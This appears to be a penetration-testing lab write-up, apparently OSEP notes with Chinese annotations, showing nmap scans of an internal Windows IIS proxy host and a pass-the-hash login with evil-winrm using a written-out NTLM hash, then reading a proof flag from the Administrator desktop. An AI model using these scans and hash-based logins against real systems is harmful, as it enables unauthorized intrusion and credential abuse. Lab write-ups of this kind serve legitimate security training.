192.168.64.169

nmap -sT -Pn -A 192.168.64.169

Nmap scan report for 192.168.64.169
Host is up (0.22s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 2 IP addresses (2 hosts up) scanned in 207.40 seconds

从内部扫描看看：

root@web05:/home# ./run-nmap.sh -Pn -A -p- 172.16.64.254
Starting Nmap 7.91SVN ( <https://nmap.org> ) at 2022-08-01 06:05 EDT
Nmap scan report for 172.16.64.254
Host is up (0.00026s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT      STATE SERVICE    VERSION
80/tcp    open  http       Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3128/tcp  open  http-proxy Squid http proxy 3.5.28
|_http-server-header: squid/3.5.28
|_http-title: ERROR: The requested URL could not be retrieved
**5985/tcp  open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)**
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49670/tcp open  msrpc      Microsoft Windows RPC
MAC Address: 00:50:56:86:39:F9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE
HOP RTT     ADDRESS
1   0.26 ms 172.16.64.254

OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 174.97 seconds

用peta的hash进行登录：

┌──(kali㉿kali)-[~/Documents/osep/tools]
└─$ **evil-winrm -u ops.comply.com\\\\pete -H 6db6cfdf45964a02a80e85a7ab9f4314 -i 172.16.64.254**

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                                               

Data: For more information, check Evil-WinRM Github: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>                                                                                                                 

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\\Users\\pete\\Documents> cd c:\\Users\\Administrator\\Desktop
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> more proof.txt
**5d725dccc25c82f36f0d9428096c5b6e**

*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.64.169
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.64.254

Ethernet adapter Ethernet1:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 172.16.64.254
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> hostname
proxy01
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop>